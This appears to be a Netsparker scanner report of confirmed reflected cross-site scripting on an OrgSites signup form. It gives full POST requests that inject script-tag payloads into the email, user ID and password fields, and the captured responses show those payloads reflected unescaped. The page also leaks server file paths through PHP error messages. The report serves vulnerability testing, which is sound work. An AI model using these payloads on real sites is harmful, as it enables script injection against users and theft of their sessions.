<!--HTML 4.01 header information--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" /><head><title>OrgSites Website Signup</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-EQUIV="Refresh" Content="1800" /><script type="text/javascript" language="javascript"><!--Beginvar submitcount=0;function checkFields(){ if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}//**End--></script> <script type="text/javascript" language="javascript"><!--Beginfunction OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}//**End--></script></head><body bgcolor=\"#cccc99\" text=\"#666633\" link=\"#537492\" vlink=\"#000000\"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><br><b>Warning</b>: OpenDir: No such file or directory (errno 2) in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1102</b><br><br><b>Warning</b>: Supplied argument is not a valid Directory resource in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1103</b><br><br><b>Warning</b>: Supplied argument is not a valid Directory resource in <b>/home/glnorg/cgi-bin/join_functions_News.php3</b> on line <b>1111</b><br><br><b>Warning</b>: Missing argument 1 for joinpage() in <b>/home/glnorg/public_html/002_Website.php3</b> on line <b>84</b><br><form action="002_Website.php3" method="post" onSubmit="return checkFields()"> <center> <!--<table width="450" cellpadding="5" cellspacing="0" border="1">--> <table width="500" cellpadding="5" cellspacing="0" border="1"> <tr bgcolor="#ffffcc"><td><font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr> <td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="4"> <b><font color="#FF0000">Oops! ...<br>Please check the following (red) entries*</font></b></font></td></tr><tr><td width="100%" align="left" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"> <font color="#FFFFFF" size="1"></font> <br/> </td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td align="left" valign="top" colspan="2" width="100%"> <font color="#000000" face="Arial, Helvetica, sans-serif" size="2"> </td></tr><tr><td align="left" valign="top" width="50%"> <p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <!--<table width="60%" cellpadding="3" cellspacing="0" border="0">--> <table width="100%" cellpadding="3" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><p/></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <img src=images/s.gif height="1" width="200"><br clear="all" /><b>First Name</b></td><td align="left" valign="top"> <input type="text" name="firstN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Last Name</b></td><td align="left" valign="top"> <input type="text" name="lastN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><font color-"#FF0000"><b>*EMAIL ADDRESS !!</b></font></td><td align="left" valign="top"> <input type="text" name="email" size="25" value="\'\"--></style></script><script>netsparker(0x002A9E)</script>"></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><font color-"#FF0000"><b>*re-enter EMAIL ADDRESS !!</b></font></td><td align="left" valign="top"> <input type="text" name="email2" size="25" value=""><br/><font color=red><b> *Please enter a valid EMAIL address !</td></tr><tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><font color="#FF0000"><b>*USER ID !!</b></font></td><td align="left" valign="top"> <input type="text" name="user" size="15" value="3"><br/><font color=blue size=2>*The USER ID NAME &quot;<font color=red><b>3</b></font>&quot; is already in use! Try adding a number or two... (before and/or after &quot;<font color=red><b>3</b></font>&quot;)...Or try using the first part of your email address (before the @ symbol)</font></td></tr><tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Please choose a password</b></td><td align="left" valign="middle"> <input type="password" name="passwrd1" size="15" value="3"> </td></tr> <tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Type password again to verify</b></td><td align="left" valign="middle"> <input type="password" name="passwrd2" size=15 value=3> </td></tr></table></td></tr> <tr><td valign="top" width="50%"> <font face="Arial, Helvetica, sans-serif" color="#000000" size="2"> <table cellpadding="5" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="bottom"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/><p/><b>Name or title of your organization</b><br/><font size="1">(This will be the title that appears on your Website, but you can change it later.)<br/>Examples: Horses, Model-T, Hang-Gliding<br/> <font color="#FF0000">The title requires letters and numbers. NO punctuation or HTML. Dashes, Blanks are OK between words.</font></font><br/><input type="text" name="title" size="40" value="3"><br/><b>Organization's street address</b> <br/><font size="1" color="#FF0000">A VALID address is needed for the Calendar Mapping Function</font><br/><input type="text" name="street" size="40" value="3"> </td></tr><tr><td align="left" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>City</b> <br/><font size="1" color="#FF0000">A VALID city is needed for the Calendar Mapping Function</font><br/><input type="text" name="city" size="15" value=3><br/><b>State</b> <br/><font size="1" color="#FF0000">A VALID state is needed for the Calendar Mapping Function</font><br/><select name="state"><option value=3>3 <OPTION VALUE="AL">Alabama <OPTION VALUE="AK">Alaska <OPTION VALUE="AZ">Arizona <OPTION VALUE="AR">Arkansas <OPTION VALUE="CA">California <OPTION VALUE="CO">Colorado <OPTION VALUE="CT">Connecticut <OPTION VALUE="DE">Delaware <OPTION VALUE="DC">D.C. <OPTION VALUE="FL">Florida <OPTION VALUE="GA">Georgia <OPTION VALUE="HI">Hawaii <OPTION VALUE="ID">Idaho <OPTION VALUE="IL">Illinois <OPTION VALUE="IN">Indiana <OPTION VALUE="IA">Iowa <OPTION VALUE="KS">Kansas <OPTION VALUE="KY">Kentucky <OPTION VALUE="LA">Louisiana <OPTION VALUE="ME">Maine <OPTION VALUE="MD">Maryland <OPTION VALUE="MA">Massachusetts <OPTION VALUE="MI">Michigan <OPTION VALUE="MN">Minnesota <OPTION VALUE="MS">Mississippi <OPTION VALUE="MO">Missouri <OPTION VALUE="MT">Montana <OPTION VALUE="NE">Nebraska <OPTION VALUE="NV">Nevada <OPTION VALUE="NH">New Hampshire <OPTION VALUE="NJ">New Jersey <OPTION VALUE="NM">New Mexico <OPTION VALUE="NY">New York <OPTION VALUE="NC">North Carolina <OPTION VALUE="ND">North Dakota <OPTION VALUE="OH">Ohio <OPTION VALUE="OK">Oklahoma <OPTION VALUE="OR">Oregon <OPTION VALUE="PA">Pennsylvania <OPTION VALUE="RI">Rhode Island <OPTION VALUE="SC">South Carolina <OPTION VALUE="SD">South Dakota <OPTION VALUE="TN">Tennessee <OPTION VALUE="TX">Texas <OPTION VALUE="UT">Utah <OPTION VALUE="VT">Vermont <OPTION VALUE="VA">Virginia <OPTION VALUE="WA">Washington <OPTION VALUE="DC">Washington D.C. <OPTION VALUE="WV">West Virginia <OPTION VALUE="WI">Wisconsin <OPTION VALUE="WY">Wyoming </SELECT><BR><b>Postal Code (ZIP)</b> <br/><font size="1" color="#FF0000">A VALID Postal Code is needed for the Calendar Mapping Function</font><br/><input type="text" name="zip" size="15" value="3"><br/><b>Phone# (555-555-5555)</b> <br/><font size="1" color="#FF0000">A VALID phone# is needed for people to contact you!!</font><br/><input type="text" name="phone" size="15" value="3"><br/></td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><hr/><table border="0"><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> &nbsp;</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Y</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> N</td></tr><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display street address on your site?</td><td><input type="radio" name="addrQ" value="Y"></td> <td><input type="radio" CHECKED name="addrQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display phone number on your site?</td><td><input type="radio" CHECKED name="phnQ" value="Y"></td> <td><input type="radio" CHECKED name="phnQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Would you like the ability to show a map to this address?</td><td><input type="radio" name="mapQ" value="Y"></td> <td><input type="radio" CHECKED name="mapQ" value="N"></td></tr></table> </td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/></td></tr><tr bgcolor="#ffffcc"><td colspan="2" align="left" valign="top"> <font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr><td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" size="4"> <b>Describe your organization and choose your Website address</b></font></td></tr><tr><td width="100%" align="center" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"><br/></td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td width="50%"><p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <p/>Short description of your organization <br/><font size="1">(This description will appear in OrgSites' Directory)</font> <br/><textarea name="body" cols="40" rows="5" wrap="virtual">3</textarea> <p/>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align="center"><p/> <select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><p/>PICK YOUR INTERNET ADDRESS (Suffix):<p/> Because your Website is hosted for free by OrgSites.com, your organization does not have to purchase its own domain name. Your internet address must therefore begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. Your full internet address for a website will look like this:<p align="center" /> <b>www.orgsites.com/state/<font size="3" color="#0000FF">name-you-choose</b></font> <p/> The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group. <p/> The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS. <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><p/><center><font color="#0000FF" size="3"> <b>Suffix&nbsp;</b></font><input type="text" name="dir_name" size="10" value="s..
- /002_Website.php3

/002_Website.php3 CONFIRMED

http://www.orgsites.com/002_Website.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
email2 POST netsparker@example.com
user POST '"--></style></script><script>alert(0x002AB1)</script>
passwrd1 POST 3
passwrd2 POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
addrQ POST N
phnQ POST N
mapQ POST N
body POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y

Request

POST /002_Website.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Website.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 329
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&email2=netsparker%40example.com&user='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002AB1)%3c%2fscript%3e&passwrd1=3&passwrd2=3&title=3&street=3&city=3&state=3&zip=3&phone=3&addrQ=N&phnQ=N&mapQ=N&body=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:55:13 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<!--HTML 4.01 header information--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" /><head><title>OrgSites Website Signup</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-EQUIV="Refresh" Content="1800" /><script type="text/javascript" language="javascript"><!--Beginvar submitcount=0;function checkFields(){ if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}//**End--></script> <script type="text/javascript" language="javascript"><!--Beginfunction OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}//**End--></script></head><body bgcolor=\"#cccc99\" text=\"#666633\" link=\"#537492\" vlink=\"#000000\"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><form action="002_Website.php3" method="post" onSubmit="return checkFields()"> <center> <!--<table width="450" cellpadding="5" cellspacing="0" border="1">--> <table width="500" cellpadding="5" cellspacing="0" border="1"> <tr bgcolor="#ffffcc"><td><font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr> <td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="4"> <b>Get your FREE OrgSites Website! </b></font></td></tr><tr><td width="100%" align="left" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"> <font color="#FFFFFF" size="1">013011</font> <br/> </td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td align="left" valign="top" colspan="2" width="100%"> <font color="#000000" face="Arial, Helvetica, sans-serif" size="2"> </td></tr><tr><td align="left" valign="top" width="50%"> <p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <!--<table width="60%" cellpadding="3" cellspacing="0" border="0">--> <table width="100%" cellpadding="3" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><font color="#FF0000" size="1">First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr/><font color="#000000" size="2"><i>ALL FIELDS ARE REQUIRED. <br/>A VALID email address is REQUIRED.</i></font><p/></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <img src=images/s.gif height="1" width="200"><br clear="all" /><b>First Name</b></td><td align="left" valign="top"> <input type="text" name="firstN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Last Name</b></td><td align="left" valign="top"> <input type="text" name="lastN" size="15" value="3"> </td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Email Address</b></td><td align="left" valign="top"> <input type="text" name="email" size="25" value="netsparker@example.com"></td></tr> <tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>re-enter Email Address</b></td><td align="left" valign="top"> <input type="text" name="email2" size="25" value=""></td></tr><tr><td align="right" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Choose your USER ID name</b></td><td align="left" valign="top"> <input type="text" name="user" size="15" value="\'\"--></style></script><script>netsparker(0x002AB1)</script>"></td></tr><tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Please choose a password</b></td><td align="left" valign="middle"> <input type="password" name="passwrd1" size="15" value="3"> </td></tr> <tr><td align="right" valign="middle"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>Type password again to verify</b></td><td align="left" valign="middle"> <input type="password" name="passwrd2" size=15 value=3> </td></tr></table></td></tr> <tr><td valign="top" width="50%"> <font face="Arial, Helvetica, sans-serif" color="#000000" size="2"> <table cellpadding="5" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="bottom"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/><p/><b>Name or title of your organization</b><br/><font size="1">(This will be the title that appears on your Website, but you can change it later.)<br/>Examples: Horses, Model-T, Hang-Gliding<br/> <font color="#FF0000">The title requires letters and numbers. NO punctuation or HTML. Dashes, Blanks are OK between words.</font></font><br/><input type="text" name="title" size="40" value="3"><br/><b>Organization's street address</b> <br/><font size="1" color="#FF0000">A VALID address is needed for the Calendar Mapping Function</font><br/><input type="text" name="street" size="40" value="3"> </td></tr><tr><td align="left" valign="top"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><b>City</b> <br/><font size="1" color="#FF0000">A VALID city is needed for the Calendar Mapping Function</font><br/><input type="text" name="city" size="15" value=3><br/><b>State</b> <br/><font size="1" color="#FF0000">A VALID state is needed for the Calendar Mapping Function</font><br/><select name="state"><option value=3>3 <OPTION VALUE="AL">Alabama <OPTION VALUE="AK">Alaska <OPTION VALUE="AZ">Arizona <OPTION VALUE="AR">Arkansas <OPTION VALUE="CA">California <OPTION VALUE="CO">Colorado <OPTION VALUE="CT">Connecticut <OPTION VALUE="DE">Delaware <OPTION VALUE="DC">D.C. <OPTION VALUE="FL">Florida <OPTION VALUE="GA">Georgia <OPTION VALUE="HI">Hawaii <OPTION VALUE="ID">Idaho <OPTION VALUE="IL">Illinois <OPTION VALUE="IN">Indiana <OPTION VALUE="IA">Iowa <OPTION VALUE="KS">Kansas <OPTION VALUE="KY">Kentucky <OPTION VALUE="LA">Louisiana <OPTION VALUE="ME">Maine <OPTION VALUE="MD">Maryland <OPTION VALUE="MA">Massachusetts <OPTION VALUE="MI">Michigan <OPTION VALUE="MN">Minnesota <OPTION VALUE="MS">Mississippi <OPTION VALUE="MO">Missouri <OPTION VALUE="MT">Montana <OPTION VALUE="NE">Nebraska <OPTION VALUE="NV">Nevada <OPTION VALUE="NH">New Hampshire <OPTION VALUE="NJ">New Jersey <OPTION VALUE="NM">New Mexico <OPTION VALUE="NY">New York <OPTION VALUE="NC">North Carolina <OPTION VALUE="ND">North Dakota <OPTION VALUE="OH">Ohio <OPTION VALUE="OK">Oklahoma <OPTION VALUE="OR">Oregon <OPTION VALUE="PA">Pennsylvania <OPTION VALUE="RI">Rhode Island <OPTION VALUE="SC">South Carolina <OPTION VALUE="SD">South Dakota <OPTION VALUE="TN">Tennessee <OPTION VALUE="TX">Texas <OPTION VALUE="UT">Utah <OPTION VALUE="VT">Vermont <OPTION VALUE="VA">Virginia <OPTION VALUE="WA">Washington <OPTION VALUE="DC">Washington D.C. <OPTION VALUE="WV">West Virginia <OPTION VALUE="WI">Wisconsin <OPTION VALUE="WY">Wyoming </SELECT><BR><b>Postal Code (ZIP)</b> <br/><font size="1" color="#FF0000">A VALID Postal Code is needed for the Calendar Mapping Function</font><br/><input type="text" name="zip" size="15" value="3"><br/><b>Phone# (555-555-5555)</b> <br/><font size="1" color="#FF0000">A VALID phone# is needed for people to contact you!!</font><br/><input type="text" name="phone" size="15" value="3"><br/></td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><hr/><table border="0"><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> &nbsp;</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Y</td><td align="center"><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> N</td></tr><tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display street address on your site?</td><td><input type="radio" name="addrQ" value="Y"></td> <td><input type="radio" CHECKED name="addrQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Display phone number on your site?</td><td><input type="radio" CHECKED name="phnQ" value="Y"></td> <td><input type="radio" CHECKED name="phnQ" value="N"></td></tr> <tr><td><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> Would you like the ability to show a map to this address?</td><td><input type="radio" name="mapQ" value="Y"></td> <td><input type="radio" CHECKED name="mapQ" value="N"></td></tr></table> </td></tr><tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <hr/></td></tr><tr bgcolor="#ffffcc"><td colspan="2" align="left" valign="top"> <font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr><td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" size="4"> <b>Describe your organization and choose your Website address</b></font></td></tr><tr><td width="100%" align="center" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"><br/></td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td width="50%"><p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <p/>Short description of your organization <br/><font size="1">(This description will appear in OrgSites' Directory)</font> <br/><textarea name="body" cols="40" rows="5" wrap="virtual">3</textarea> <p/>Please select your organization's type/category. (Your organization will be categorized in the OrgSites Directory so viewers can find you by type or category.)<div align="center"><p/> <select name="ccatg"><option value=Animals>Animals<OPTION VALUE=Animals>Animals<OPTION VALUE=Arts_Culture>Arts-Culture<OPTION VALUE=Business>Business<OPTION VALUE=Computers>Computers<OPTION VALUE=Disaster>Disaster<OPTION VALUE=Education>Education<OPTION VALUE=Environment>Environment<OPTION VALUE=Ethnic>Ethnic<OPTION VALUE=Fraternal>Fraternal<OPTION VALUE=Gov-Politics>Gov-Politics<OPTION VALUE=Health>Health<OPTION VALUE=Hobbies>Hobbies<OPTION VALUE=Religion>Religion<OPTION VALUE=Service>Service<OPTION VALUE=Social>Social<OPTION VALUE=Sports>Sports<OPTION VALUE=Youth>Youth<OPTION VALUE=Unique>Unique</select></div><p><p/>PICK YOUR INTERNET ADDRESS (Suffix):<p/> Because your Website is hosted for free by OrgSites.com, your organization does not have to purchase its own domain name. Your internet address must therefore begin with <b>www.orgsites.com</b>. Following this comes your state abbreviation (which is automatically supplied from the information you give above) and then the name you choose for your organization. Your full internet address for a website will look like this:<p align="center" /> <b>www.orgsites.com/state/<font size="3" color="#0000FF">name-you-choose</b></font> <p/> The only part of your URL that you will need to choose is the word or continuous character string for the NAME-YOU-CHOOSE (Suffix) portion of your address. Use a short, descriptive name that is easily associated with your group. <p/> The name must be a continuous string of letters, with no spaces, all lower case. DO NOT USE SPACES OR SPECIAL CHARACTERS. <B>(&#064; . &#035; &#036; &#037; &#094; &amp; | / + ' &quot; ? ~ &lt; &gt;)</B>. A hyphen (-) is OK to separate words. <font color=red>Do not supply your state abbreviation. That is supplied automatically. Supply only the very last part (<b>Suffix</b>) of your URL.</font><p/><center><font color="#0000FF" size="3"> <b>Suffix&nbsp;</b></font><input type="text" name="dir_name" size="10" value="Smith"><p/> </td></tr> <tr><td align="left" valign="middle" colspan="2"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> </font></td></tr></table><p/><p/><hr/><p/> <div align="center"> <input type="submit" name="submit" value="DONE ...Give me my site!"> <p/><font size="1" color="#FF0000">To Cancel This Sign-Up, <a href=javascript:close()>CLICK HERE</a></font> </div><input type="hidden" NAME="country" VALUE="USA"> <input type="hidden" NAME="valp" VALUE="not_used"> <input type="hidden" N..
- /002_Website.php3

/002_Website.php3 CONFIRMED

http://www.orgsites.com/002_Website.php3

Parameters

Parameter Type Value
firstN POST 3
lastN POST 3
email POST netsparker@example.com
email2 POST netsparker@example.com
user POST 3
passwrd1 POST '"--></style></script><script>alert(0x002AB2)</script>
passwrd2 POST 3
title POST 3
street POST 3
city POST 3
state POST 3
zip POST 3
phone POST 3
addrQ POST N
phnQ POST N
mapQ POST N
body POST 3
ccatg POST Animals
dir_name POST Smith
country POST USA
valp POST not_used
subs POST Y

Request

POST /002_Website.php3 HTTP/1.1
Referer: http://www.orgsites.com/002_Website.php3
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.orgsites.com
Cookie: idV[33741]=862673926; idV[49035]=198432167; idV[54622]=321812240; idV[52895]=1067304613; idV[48945]=693846868; idV[47313]=175002378; idV[1911]=282431166; idV[50350]=1848186732; idV[50023]=1244575100; idV[28256]=634765200; idV[50522]=1188109459; idV[34463]=897324517; idV[34546]=263065073; idV[34964]=1177416072; idV[35310]=1277277378; idV[40329]=1594343500; idV[43800]=1032077503; idV[38440]=233593925; idV[44345]=2105004117; idV[47371]=301324675
Content-Length: 329
Accept-Encoding: gzip, deflate

firstN=3&lastN=3&email=netsparker%40example.com&email2=netsparker%40example.com&user=3&passwrd1='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x002AB2)%3c%2fscript%3e&passwrd2=3&title=3&street=3&city=3&state=3&zip=3&phone=3&addrQ=N&phnQ=N&mapQ=N&body=3&ccatg=Animals&dir_name=Smith&country=USA&valp=not_used&subs=Y

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:55:25 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
X-Powered-By: PHP/4.1.2
Transfer-Encoding: chunked
Content-Type: text/html


<!--HTML 4.01 header information--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" /><head><title>OrgSites Website Signup</title><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-EQUIV="Refresh" Content="1800" /><script type="text/javascript" language="javascript"><!--Beginvar submitcount=0;function checkFields(){ if (submitcount == 0) { submitcount++; return true; } else { alert("Please be patient ... we are processing your request now"); return false; }}//**End--></script> <script type="text/javascript" language="javascript"><!--Beginfunction OpenWindowT(url, name){ popupWin = window.open(url, name, 'scrollbars=1,toolbar=1,resizable=1,width=600,height=400,left=20,top=20')}//**End--></script></head><body bgcolor=\"#cccc99\" text=\"#666633\" link=\"#537492\" vlink=\"#000000\"><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><form action="002_Website.php3" method="post" onSubmit="return checkFields()"> <center> <!--<table width="450" cellpadding="5" cellspacing="0" border="1">--> <table width="500" cellpadding="5" cellspacing="0" border="1"> <tr bgcolor="#ffffcc"><td><font face="Verdana, Arial, Helvetica, sans-serif" size="2"> <table width="100%"><tr> <td align="left" valign="bottom"> <font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="4"> <b>Get your FREE OrgSites Website! </b></font></td></tr><tr><td width="100%" align="left" valign="top" bgcolor="#666633"> <img src=images/s.gif height="3" width="3"> <font color="#FFFFFF" size="1">013011</font> <br/> </td></tr></table><table width="100%" cellspacing="0" cellpadding="6" border="0" bgcolor="#ffffcc"> <tr><td align="left" valign="top" colspan="2" width="100%"> <font color="#000000" face="Arial, Helvetica, sans-serif" size="2"> </td></tr><tr><td align="left" valign="top" width="50%"> <p/><font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"> <!--<table width="60%" cellpadding="3" cellspacing="0" border="0">--> <table width="100%" cellpadding="3" cellspacing="0" border="0"> <tr><td colspan="2" align="left" valign="top"> <font face="Arial, Helvetica, sans-serif" color="#002F1C" size="2"><font color="#FF0000" size="1">First, please read <a href="javascript:OpenWindowT('terms.html', '')"><b>ORGSITES' TERMS OF USE</b>.</a> If you disagree with any term of use, you should not use this site. [click <a href=javascript:close()>HERE</a> if you do not agree with the Terms of Use]</font><hr/><font color="#000000" size="2"><i>ALL 